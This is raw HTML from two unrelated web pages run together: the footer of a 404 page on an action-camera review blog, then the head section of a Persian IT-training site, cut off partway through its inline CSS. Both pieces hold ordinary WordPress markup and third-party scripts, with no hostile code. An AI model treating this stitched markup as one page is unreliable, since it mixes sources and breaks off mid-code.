href="http://elproducente.com/deals-sales-coupon-codes/">Deals, Sales &#038; Coupon Codes</a></li> <li class="page_item page-item-4607"><a href="http://elproducente.com/drones/">Drones</a></li> <li class="page_item page-item-6994"><a href="http://elproducente.com/e-scooter-vergleich/">e-scooter-vergleich.de</a></li> <li class="page_item page-item-1519"><a href="http://elproducente.com/eken/">EKEN</a></li> <li class="page_item page-item-1160"><a href="http://elproducente.com/gitup-action-camera/">GitUp Action Camera</a></li> <li class="page_item page-item-2621"><a href="http://elproducente.com/giveaway-win-action-cameras-accessories/">Giveaway &#8211; Win Action Cameras &#038; Accessories</a></li> <li class="page_item page-item-1155"><a href="http://elproducente.com/gopro/">GoPro</a></li> <li class="page_item page-item-1199"><a href="http://elproducente.com/gopro-accessories/">GoPro Accessories</a></li> <li class="page_item page-item-780"><a href="http://elproducente.com/imprint/">Imprint</a></li> <li class="page_item page-item-2388"><a href="http://elproducente.com/newsletter/">Newsletter</a></li> <li class="page_item page-item-1163"><a href="http://elproducente.com/other-brands/">Other Brands</a></li> <li class="page_item page-item-1076"><a href="http://elproducente.com/sjcam/">SJCAM</a></li> <li class="page_item page-item-1202"><a href="http://elproducente.com/sjcam-accessories/">SJCAM Accessories</a></li> <li class="page_item page-item-1060"><a href="http://elproducente.com/thank-you-newsletter/">Thank You!</a></li> <li class="page_item page-item-1965"><a href="http://elproducente.com/tutorials/">Tutorials</a></li> <li class="page_item page-item-121"><a href="http://elproducente.com/xiaomi-yi/">XIAOMI YI</a></li> <li class="page_item page-item-1191"><a href="http://elproducente.com/xiaomi-yi-accessories/">Xiaomi Yi Accessories</a></li> <li class="page_item page-item-6996"><a href="http://elproducente.com/xiaomi-e-scooter-m365-praxis-test-review/">xiaomi-e-scooter-m365-praxis-test-review/</a></li> </ul> </div> <div class="span4"> <h3>Categories</h3> <ul> <li class="cat-item cat-item-10"><a href="http://elproducente.com/category/accessory-review/" title="Accessories for all or most action camera models">ACCESSORIES</a> </li> <li class="cat-item cat-item-17"><a href="http://elproducente.com/category/camera-review/" title="Here is a list of camera reviews and overviews I did:">Camera Review</a> <ul class='children'> <li class="cat-item cat-item-50"><a href="http://elproducente.com/category/camera-review/360-camera/" title="Articles related to 360° cameras">Camera Review &#8211; 360° cameras</a> </li> <li class="cat-item cat-item-51"><a href="http://elproducente.com/category/camera-review/4k-cameras/" title="Articles related to 4K cameras">Camera Review &#8211; 4K Camera</a> </li> <li class="cat-item cat-item-60"><a href="http://elproducente.com/category/camera-review/dash-camera/" >Dash Camera</a> </li> <li class="cat-item cat-item-59"><a href="http://elproducente.com/category/camera-review/100-usd-cameras/" title="Cameras below 100 USD">under 100 $ Cameras</a> </li> <li class="cat-item cat-item-61"><a href="http://elproducente.com/category/camera-review/under-50-cameras/" title="Action Cameras under 50 USD">under 50 $ Cameras</a> </li> </ul> </li> <li class="cat-item cat-item-57"><a href="http://elproducente.com/category/comparison/" title="Articles comparing Action Cameras">Comparison</a> </li> <li class="cat-item cat-item-55"><a href="http://elproducente.com/category/drone/" title="All about drones">Drone</a> </li> <li class="cat-item cat-item-45"><a href="http://elproducente.com/category/eken/" >EKEN</a> </li> <li class="cat-item cat-item-37"><a href="http://elproducente.com/category/gimbal/" >GIMBAL</a> </li> <li class="cat-item cat-item-4"><a href="http://elproducente.com/category/gitup/" title="All about GitUp cameras">GITUP</a> </li> <li class="cat-item cat-item-52"><a href="http://elproducente.com/category/giveaway/" title="Win Action Cameras &amp; Accessories">Giveaway</a> </li> <li class="cat-item cat-item-5"><a href="http://elproducente.com/category/gopro/" title="All about GoPro cameras">GOPRO</a> <ul class='children'> <li class="cat-item cat-item-22"><a href="http://elproducente.com/category/gopro/gopro-accessories/" title="Accessories for GoPro cameras">GoPro Accessories</a> </li> </ul> </li> <li class="cat-item cat-item-53"><a href="http://elproducente.com/category/mgcool/" >MGCOOL</a> </li> <li class="cat-item cat-item-1"><a href="http://elproducente.com/category/others/" title="General Action Camera News">OTHER CAMERAS</a> </li> <li class="cat-item cat-item-6"><a href="http://elproducente.com/category/sjcam/" title="All about SJCAM cameras">SJCAM</a> <ul class='children'> <li class="cat-item cat-item-20"><a href="http://elproducente.com/category/sjcam/sjcam-accessories/" title="Accessories for SJCAM cameras">SJCAM Accessories</a> </li> </ul> </li> <li class="cat-item cat-item-49"><a href="http://elproducente.com/category/tutorials/" >TUTORIALS</a> </li> <li class="cat-item cat-item-56"><a href="http://elproducente.com/category/xiaomi/" >XIAOMI MIJIA</a> </li> <li class="cat-item cat-item-3"><a href="http://elproducente.com/category/yi-camera/" title="All about YI cameras: YI Action Camera &amp; YI Dash Camera">YI CAMERA</a> <ul class='children'> <li class="cat-item cat-item-19"><a href="http://elproducente.com/category/yi-camera/xiaomi-yi-accessories/" title="Accessories for Xiaomi Yi camera">YI Camera Accessories</a> </li> </ul> </li> </ul> </div> <div class="span4"> <h3>Authors</h3> <ul><li><a href="http://elproducente.com/author/el-producente/" title="Posts by el Producente">el Producente</a></li></ul> </div> </div> </div> </div> </div> </div> </div> </div><!-- #main-container --> </div><!-- #main-container-wrap --> <div id="footer-copyright-wrap"> <div id="footer-wrap"> <div id="footer" class="footer-widgets container"> <div class="row"> <div class="span4"> <div id="text-6" class="widget widget_text clearfix"><div class="page-title clearfix"><h5 class="mimic-small uppercase subtle-text-color"><span>Get the latest Action Cam news:</span></h5></div> <div class="textwidget"><!-- MailChimp for WordPress v3.1.12 - https://wordpress.org/plugins/mailchimp-for-wp/ --><form id="mc4wp-form-1" class="mc4wp-form mc4wp-form-1055" method="post" data-id="1055" data-name="Subscribe" ><div class="mc4wp-form-fields"><p> <label>First Name</label> <input type="text" name="FNAME" required> </p> <p> <label>Last Name</label> <input type="text" name="LNAME" required> </p> <p> <label>Email address: </label> <input type="email" name="EMAIL" placeholder="Your email address" required /> </p> <p> <input type="submit" value="Sign up" /> </p><div style="display: none;"><input type="text" name="_mc4wp_honeypot" value="" tabindex="-1" autocomplete="off" /></div><input type="hidden" name="_mc4wp_timestamp" value="1558021265" /><input type="hidden" name="_mc4wp_form_id" value="1055" /><input type="hidden" name="_mc4wp_form_element_id" value="mc4wp-form-1" /></div><div class="mc4wp-response"></div></form><!-- / MailChimp for WordPress Plugin --></div> </div></div> <div class="span4"> <div id="post-recent-4" class="widget recent-posts-widget clearfix"><div class="page-title clearfix"><h5 class="mimic-small uppercase subtle-text-color"><span>Recent Posts</span></h5></div><ul> <li class="post-widget clearfix"> <div class="widget-thumbnail"> <a href="http://elproducente.com/dji-osmo-action-vs-gopro-hero7-black-vs-sjcam-sj9-strike-comparison-review-best-action-camera-2019/" class="thumb-link"> <img width="60" src="http://elproducente.com/wp-content/uploads/DJI-OSMO-Action-vs-GoPro-Hero7-black-vs-SJCAM-SJ9-Strike-title2-150x150.jpg" alt="DJI Osmo Action vs GoPro Hero7 black vs SJCAM SJ9 Strike &#8211; Comparison"/> </a> </div><!-- / div.widget-thumbnail --> <div class="widget-context"> <h4><a href="http://elproducente.com/dji-osmo-action-vs-gopro-hero7-black-vs-sjcam-sj9-strike-comparison-review-best-action-camera-2019/" class="read">DJI Osmo Action vs GoPro Hero7 black vs SJCAM SJ9 Strike &#8211; Comparison</a></h4> <small>May 15, 2019</small> </div><!-- end div.widget-context --> </li><!-- end div.post-widget --> <li class="post-widget clearfix"> <div class="widget-thumbnail"> <a href="http://elproducente.com/dji-osmo-action-camera-review-manual/" class="thumb-link"> <img width="60" src="http://elproducente.com/wp-content/uploads/DJI-OSMO-Action-Camera-title-150x150.jpg" alt="DJI OSMO Action Camera &#8211; release May 15th"/> </a> </div><!-- / div.widget-thumbnail --> <div class="widget-context"> <h4><a href="http://elproducente.com/dji-osmo-action-camera-review-manual/" class="read">DJI OSMO Action Camera &#8211; release May 15th</a></h4> <small>May 10, 2019</small> </div><!-- end div.widget-context --> </li><!-- end div.post-widget --> <li class="post-widget clearfix"> <div class="widget-thumbnail"> <a href="http://elproducente.com/best-small-travel-vlog-action-camera-dji-osmo-pocket-gopro-hero7-black-insta360-onex-comparision-review-manual/" class="thumb-link"> <img width="60" src="http://elproducente.com/wp-content/uploads/DJI-Osmo-Pocket-vs-GoPro-Hero7-black-vs-Insta360-OneX-comparison-title-150x150.jpg" alt="Best small travel &#038; vlog camera &#8211; DJI Osmo Pocket vs GoPro Hero7 black vs Insta360 One X"/> </a> </div><!-- / div.widget-thumbnail --> <div class="widget-context"> <h4><a href="http://elproducente.com/best-small-travel-vlog-action-camera-dji-osmo-pocket-gopro-hero7-black-insta360-onex-comparision-review-manual/" class="read">Best small travel &#038; vlog camera &#8211; DJI Osmo Pocket vs GoPro Hero7 black vs Insta360 One X</a></h4> <small>April 11, 2019</small> </div><!-- end div.widget-context --> </li><!-- end div.post-widget --> <li class="post-widget clearfix"> <div class="widget-thumbnail"> <a href="http://elproducente.com/sjcam-sj9-strike-sj9-max-waterproof-action-camera-series-review-manual/" class="thumb-link"> <img width="60" src="http://elproducente.com/wp-content/uploads/SJCAM-SJ9-Strike-waterproof-wireless-charge-150x150.jpg" alt="SJCAM SJ9 Series: SJ9 Strike &#038; SJ9 Max &#8211; Comparison"/> </a> </div><!-- / div.widget-thumbnail --> <div class="widget-context"> <h4><a href="http://elproducente.com/sjcam-sj9-strike-sj9-max-waterproof-action-camera-series-review-manual/" class="read">SJCAM SJ9 Series: SJ9 Strike &#038; SJ9 Max &#8211; Comparison</a></h4> <small>April 10, 2019</small> </div><!-- end div.widget-context --> </li><!-- end div.post-widget --> <li class="post-widget clearfix"> <div class="widget-thumbnail"> <a href="http://elproducente.com/sony-rx0-ii-vs-gopro-hero7-black-vs-dji-osmo-pocket-best-vlog-action-camera-review/" class="thumb-link"> <img width="60" src="http://elproducente.com/wp-content/uploads/Sony-RX0-II-GoPro-Hero7-black-DJI-Osmo-Pocket-vlog-camera-title-150x150.jpg" alt="Sony RX0 II vs GoPro Hero7 black vs DJI Osmo Pocket &#8211; best vlog &#038; action camera"/> </a> </div><!-- / div.widget-thumbnail --> <div class="widget-context"> <h4><a href="http://elproducente.com/sony-rx0-ii-vs-gopro-hero7-black-vs-dji-osmo-pocket-best-vlog-action-camera-review/" class="read">Sony RX0 II vs GoPro Hero7 black vs DJI Osmo Pocket &#8211; best vlog &#038; action camera</a></h4> <small>March 29, 2019</small> </div><!-- end div.widget-context --> </li><!-- end div.post-widget --> </ul></div></div> <div class="span4"> <div id="ts-custom-menu-3" class="widget ts-custom-menu-widget clearfix"><div class="page-title clearfix"><h5 class="mimic-small uppercase subtle-text-color"><span>Categories</span></h5></div><div class="ts-custom-menu-wrap ts-menu-style-angles"><div class="menu-categories-menu-container"><ul id="menu-categories-menu" class="menu"><li id="menu-item-101" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-101"><a href="http://elproducente.com/category/yi-camera/">YI CAMERA</a></li> <li id="menu-item-100" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-100"><a href="http://elproducente.com/category/sjcam/">SJCAM</a></li> <li id="menu-item-102" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-102"><a href="http://elproducente.com/category/gitup/">GITUP</a></li> <li id="menu-item-105" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-105"><a href="http://elproducente.com/category/gopro/">GOPRO</a></li> <li id="menu-item-104" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-104"><a href="http://elproducente.com/category/others/">OTHER CAMERAS</a></li> <li id="menu-item-103" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-103"><a href="http://elproducente.com/category/accessory-review/">ACCESSORIES</a></li> </ul></div></div></div><div id="text-5" class="widget widget_text clearfix"><div class="page-title clearfix"><h5 class="mimic-small uppercase subtle-text-color"><span>LIKE</span></h5></div> <div class="textwidget"><script src="https://apis.google.com/js/platform.js"></script> <div class="g-ytsubscribe" data-channelid="UC_IkEGFiWlyQQYJsKHDN4PA" data-layout="default" data-count="default"></div></div> </div><div id="ts_facebook_like_button_widget-8" class="widget facebook-like-button-widget clearfix"><div class="inner"><div><iframe src="//www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Felproducente&amp;send=false&amp;layout=standard&amp;width=300&amp;show_faces=false&amp;font&amp;colorscheme=light&amp;action=like&amp;height=35" style="border:none; overflow:hidden; width:300px; height:35px;"></iframe></div></div></div></div></div> </div> </div> <div id="copyright-nav-wrap"> <div id="copyright-nav" class="container"> <div class="row"> <div class="nav mimic-smaller uppercase span6"> <ul id="menu-footer" class="menu"><li id="menu-item-43" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-43"><a href="http://elproducente.com/">BLOG / NEWS</a></li> <li id="menu-item-108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-108"><a href="http://elproducente.com/about/">ABOUT</a></li> <li id="menu-item-142" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-142"><a href="http://elproducente.com/contact/">CONTACT</a></li> <li id="menu-item-2222" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2222"><a href="http://elproducente.com/imprint/">Imprint</a></li> </ul> </div> <div class="copyright span6"> <p>© Copyright 2019. All rights reserved.</p> </div> </div> </div> </div> </div> </div> </div> <script type='text/javascript' src='https://maps.googleapis.com/maps/api/js?ver=4.3.19'></script> <!--[if lte IE 9]> <script type='text/javascript' src='http://elproducente.com/wp-content/plugins/mailchimp-for-wp/assets/js/third-party/placeholders.min.js?ver=3.1.12'></script> <![endif]--> <div id="cookie-notice" role="banner" class="cn-bottom bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">Sorry to bother you, we use cookies like everyone else. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a> </div> </div><script type="text/javascript" defer src="http://elproducente.com/wp-content/cache/autoptimize/js/autoptimize_3d7cc13ee78904bd87de0fb52aab7df3.js"></script></body> </html> <!-- ZenCache is NOT caching this page, because the WordPress `is_404()` Conditional Tag says the current page is a 404 error. The current configuration says NOT to cache 404 errors. -->
0
<!DOCTYPE html> <!--[if IE 8]> <html class="ie ie8" dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if IE 9]> <html class="ie ie9" dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns#"> <![endif]--> <!--[if gt IE 9]><!--> <html dir="rtl" lang="fa-IR" prefix="og: http://ogp.me/ns#"> <!--<![endif]--> <head> <script type="text/javascript"> (function(){ var now = new Date(); var version = now.getFullYear().toString() + "0" + now.getMonth() + "0" + now.getDate() + "0" + now.getHours(); var head = document.getElementsByTagName("head")[0]; var link = document.createElement("link"); link.rel = "stylesheet"; link.href = "https://app.najva.com/static/css/local-messaging.css" + "?v=" + version; head.appendChild(link); var script = document.createElement("script"); script.type = "text/javascript"; script.async = true; script.src = "https://app.najva.com/static/js/scripts/technet24179-3237-6a79a3ce-0166-4ec1-92bb-a70a02f687dc.js" + "?v=" + version; head.appendChild(script); })() </script> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="pingback" href="https://technet24.ir/xmlrpc.php"/> <title>Technet24 - آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت</title> <!-- This site is optimized with the Yoast SEO Premium plugin v11.1 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="https://technet24.ir/" /> <meta property="og:locale" content="fa_IR" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Technet24 - آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت" /> <meta property="og:url" content="https://technet24.ir/" /> <meta property="og:site_name" content="آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:title" content="Technet24 - آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت" /> <meta name="msvalidate.01" content="2F60B2DB984CBE1C888077911D48FC0A" /> <meta name="google-site-verification" content="3nDHwOhhYaEbd-bsHm44CjF4n69kQ8J4npXfOSjJSiU" /> <meta name="yandex-verification" content="4aff4fae38849388" /> <!-- / Yoast SEO Premium plugin. --> <link rel='dns-prefetch' href='//fonts.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت &raquo; خوراک" href="https://technet24.ir/feed" /> <link rel="alternate" type="application/rss+xml" title="آموزش و دانلود و انجمن تخصصی شبکه سیسکو و مایکروسافت و امنیت &raquo; خوراک دیدگاه‌ها" href="https://technet24.ir/comments/feed" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/technet24.ir\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-rtl-css' href='https://technet24.ir/wp-includes/css/dist/block-library/style-rtl.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_stylesheet-css' href='https://technet24.ir/wp-content/plugins/captcha/css/front_end_style.css?ver=4.4.5' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://technet24.ir/wp-includes/css/dashicons.min.css?ver=5.2' type='text/css' media='all' /> <link rel='stylesheet' id='cptch_desktop_style-css' href='https://technet24.ir/wp-content/plugins/captcha/css/desktop_style.css?ver=4.4.5' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://technet24.ir/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-rtl-css' href='https://technet24.ir/wp-content/plugins/contact-form-7/includes/css/styles-rtl.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='js_composer_front-css' href='https://technet24.ir/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=5.5.5' type='text/css' media='all' /> <link rel='stylesheet' id='better-framework-main-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto:500' type='text/css' media='all' /> <script type='text/javascript' src='https://technet24.ir/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://technet24.ir/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <!--[if lt IE 9]> <script type='text/javascript' src='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/js/html5shiv.min.js?ver=3.10.7'></script> <![endif]--> <!--[if lt IE 9]> <script type='text/javascript' src='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/js/respond.min.js?ver=3.10.7'></script> <![endif]--> <link rel='https://api.w.org/' href='https://technet24.ir/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://technet24.ir/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://technet24.ir/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.2" /> <link rel='shortlink' href='https://technet24.ir/' /> <link rel="alternate" type="application/json+oembed" href="https://technet24.ir/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechnet24.ir%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://technet24.ir/wp-json/oembed/1.0/embed?url=https%3A%2F%2Ftechnet24.ir%2F&#038;format=xml" /> <link rel="amphtml" href="https://technet24.ir/amp/"/> <meta name="google-site-verification" content="3nDHwOhhYaEbd-bsHm44CjF4n69kQ8J4npXfOSjJSiU" /> <meta name="msvalidate.01" content="F2D38442F4A1AFDD02FDB9EED795AD12" /> <meta name="yandex-verification" content="a57998d296cd130e" /> <link rel="shortcut icon" href="https://technet24.ir/wp-content/uploads/2018/02/favicon.ico"> <link rel="apple-touch-icon" href="https://technet24.ir/wp-content/uploads/2018/02/favicon.ico"> <link rel="apple-touch-icon" sizes="114x114" href="https://technet24.ir/wp-content/uploads/2018/02/favicon.ico"> <link rel="apple-touch-icon" sizes="72x72" href="https://technet24.ir/wp-content/uploads/2018/02/favicon.ico"> <link rel="apple-touch-icon" sizes="144x144" href="https://technet24.ir/wp-content/uploads/2018/02/favicon.ico"><meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://technet24.ir/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--><script type="application/ld+json">{ "@context": "http:\/\/schema.org\/", "@type": "organization", "@id": "#organization", "logo": { "@type": "ImageObject", "url": "https:\/\/technet24.ir\/wp-content\/uploads\/2019\/05\/logo-ramazan-04.jpg" }, "url": "https:\/\/technet24.ir\/", "name": "\u0622\u0645\u0648\u0632\u0634 \u0648 \u062f\u0627\u0646\u0644\u0648\u062f \u0648 \u0627\u0646\u062c\u0645\u0646 \u062a\u062e\u0635\u0635\u06cc \u0634\u0628\u06a9\u0647 \u0633\u06cc\u0633\u06a9\u0648 \u0648 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0648 \u0627\u0645\u0646\u06cc\u062a", "description": "\u062a\u06a9\u0646\u062a 24 \u2122 \u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u062f\u0627\u0646\u0644\u0648\u062f \u0628\u0647 \u0631\u0648\u0632\u062a\u0631\u06cc\u0646 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631\u0647\u0627\u06cc \u0634\u0628\u06a9\u0647 \u0633\u06cc\u0633\u06a9\u0648 \u0648 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0648 \u0627\u0645\u0646\u06cc\u062a" }</script> <script type="application/ld+json">{ "@context": "http:\/\/schema.org\/", "@type": "WebSite", "name": "\u0622\u0645\u0648\u0632\u0634 \u0648 \u062f\u0627\u0646\u0644\u0648\u062f \u0648 \u0627\u0646\u062c\u0645\u0646 \u062a\u062e\u0635\u0635\u06cc \u0634\u0628\u06a9\u0647 \u0633\u06cc\u0633\u06a9\u0648 \u0648 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0648 \u0627\u0645\u0646\u06cc\u062a", "alternateName": "\u062a\u06a9\u0646\u062a 24 \u2122 \u0645\u0642\u0627\u0644\u0627\u062a \u0648 \u062f\u0627\u0646\u0644\u0648\u062f \u0628\u0647 \u0631\u0648\u0632\u062a\u0631\u06cc\u0646 \u0646\u0631\u0645 \u0627\u0641\u0632\u0627\u0631\u0647\u0627\u06cc \u0634\u0628\u06a9\u0647 \u0633\u06cc\u0633\u06a9\u0648 \u0648 \u0645\u0627\u06cc\u06a9\u0631\u0648\u0633\u0627\u0641\u062a \u0648 \u0627\u0645\u0646\u06cc\u062a", "url": "https:\/\/technet24.ir\/", "potentialAction": { "@type": "SearchAction", "target": "https:\/\/technet24.ir\/search{search_term}", "query-input": "required name=search_term" } }</script> <link rel='stylesheet' id='bf-slick' href='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/css/slick.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='br-numbers' href='https://fonts.googleapis.com/css?family=Oswald&text=0123456789./\%' type='text/css' media='all' /> <link rel='stylesheet' id='better-reviews' href='https://technet24.ir/wp-content/plugins/better-reviews/css/better-reviews.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='better-reviews-rtl' href='https://technet24.ir/wp-content/plugins/better-reviews/css/better-reviews-rtl.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='bs-icons' href='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/css/bs-icons.css' type='text/css' media='all' /> <link rel='stylesheet' id='blockquote-pack-pro' href='https://technet24.ir/wp-content/plugins/blockquote-pack-pro/css/blockquote-pack.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='blockquote-pack-rtl' href='https://technet24.ir/wp-content/plugins/blockquote-pack-pro/css/blockquote-pack-rtl.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='pretty-photo' href='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/css/pretty-photo.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='theme-libs' href='https://technet24.ir/wp-content/themes/publisher/css/theme-libs.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='fontawesome' href='https://technet24.ir/wp-content/themes/publisher/includes/libs/better-framework/assets/css/font-awesome.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='publisher' href='https://technet24.ir/wp-content/themes/publisher/style-7.5.4.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='publisher-rtl' href='https://technet24.ir/wp-content/themes/publisher/rtl.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='7.5.4-1557910684' href='https://technet24.ir/wp-content/bs-booster-cache/3bb704f904ec385077bb864d70a7b9ac.css' type='text/css' media='all' /> <style type="text/css" id="wp-custom-css"> body.single-post .single-container{ background: #fff; border-radius: 3px; padding: 9px; border: 1px solid #cacaca; } </style> <style type="text/css" data-type="vc_shortcodes-custom-css">.vc_custom_1540330716512{border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-top: 9px !important;padding-right: 9px !important;padding-bottom: 9px !important;padding-left: 9px !important;border-left-color: #d1d1d1 !important;border-left-style: solid !important;border-right-color: #d1d1d1 !important;border-right-style: solid !important;border-top-color: #d1d1d1 !important;border-top-style: solid !important;border-bottom-color: #d1d1d1 !important;border-bottom-style: solid !important;border-radius: 1px !important;}.vc_custom_1556453365466{border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-right: 9px !important;padding-bottom: 9px !important;padding-left: 9px !important;background-color: #ffffff !important;border-left-color: #dddddd !important;border-left-style: solid !important;border-right-color: #dddddd !important;border-right-style: solid !important;border-bottom-color: #dddddd !important;border-bottom-style: solid !important;border-radius: 1px !important;}.vc_custom_1517680594598{border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-bottom: 9px !important;background-color: #ffffff !important;border-left-color: #dddddd !important;border-left-style: solid !important;border-right-color: #dddddd !important;border-right-style: solid !important;border-top-color: #dddddd !important;border-top-style: solid !important;border-bottom-color: #dddddd !important;border-bottom-style: solid !important;border-radius: 1px !important;}.vc_custom_1545582435152{border-top-width: 4px !important;border-top-color: #020202 !important;border-top-style: solid !important;border-radius: 2px !important;}.vc_custom_1517773944722{border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-top: 9px !important;padding-right: 9px !important;padding-bottom: 9px !important;padding-left: 9px !important;background-color: #ffffff !important;border-left-color: #dddddd !important;border-left-style: solid !important;border-right-color: #dddddd !important;border-right-style: solid !important;border-top-color: #dddddd !important;border-top-style: solid !important;border-bottom-color: #dddddd !important;border-bottom-style: solid !important;border-radius: 1px !important;}.vc_custom_1517681560266{border-top-width: 1px !important;border-right-width: 1px !important;border-bottom-width: 1px !important;border-left-width: 1px !important;padding-top: 0px !important;padding-right: 9px !important;padding-bottom: 9px !important;padding-left: 9px !important;background-color: #ffffff !important;border-left-color: #cacaca !important;border-left-style: solid !important;border-right-color: #cacaca !important;border-right-style: solid !important;border-top-color: #cacaca !important;border-top-style: solid !important;border-bottom-color: #cacaca !important;border-bottom-style: solid !important;border-radius: 1px 